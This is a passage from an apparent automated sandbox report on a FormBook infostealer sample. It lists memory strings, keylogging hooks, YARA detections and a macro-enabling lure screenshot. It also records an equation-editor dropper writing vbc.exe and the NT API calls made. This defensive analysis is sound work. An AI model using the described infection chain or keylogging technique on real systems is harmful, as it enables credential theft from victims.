            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2152827902.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.2155629669.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000006.00000000.2151699678.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.2161003996.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmpString found in binary or memory: https://api.coinmarketcap.com/v1/ticker/
            Source: vbc.exe, vbc.exe, 00000005.00000002.2188294879.0000000000B82000.00000020.00020000.sdmp, svchost.exe, 00000007.00000002.2350236075.00000000005FC000.00000004.00000020.sdmpString found in binary or memory: https://coinmarketcap.com/api/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: vbc[1].exe.2.dr, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
            Source: vbc.exe.2.dr, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
            Source: 4.2.vbc.exe.b80000.3.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
            Source: 4.0.vbc.exe.b80000.0.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
            Source: 5.2.vbc.exe.b80000.1.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
            Source: 5.0.vbc.exe.b80000.0.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: document is protected 16 17 18 19 20 21 Open the document in If this document was 22 Mkrosof
            Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 :: " ~ 31 0 0 0 0 0 q 32 ~ 33 0 0 0 0 0
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004181CE NtCreateFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041827C NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004182CA NtReadFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004182FA NtClose,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004183AA NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C200C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C20048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C20078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C207AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C210D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C20060 NtQuerySection,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C201D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C21148 NtOpenThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C2010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1F8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C21930 NtSetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1F938 NtWriteFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FAB8 NtQueryValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FA50 NtEnumerateValueKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FA20 NtQueryInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FBE8 NtQueryVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FB50 NtCreateKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C20C40 NtGetContextThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FC48 NtSetInformationFile,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FC30 NtOpenProcess,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C21D80 NtSuspendThread,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FD5C NtEnumerateKey,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FE24 NtWriteVirtualMemory,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FFFC NtCreateProcessEx,
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00C1FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008E07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
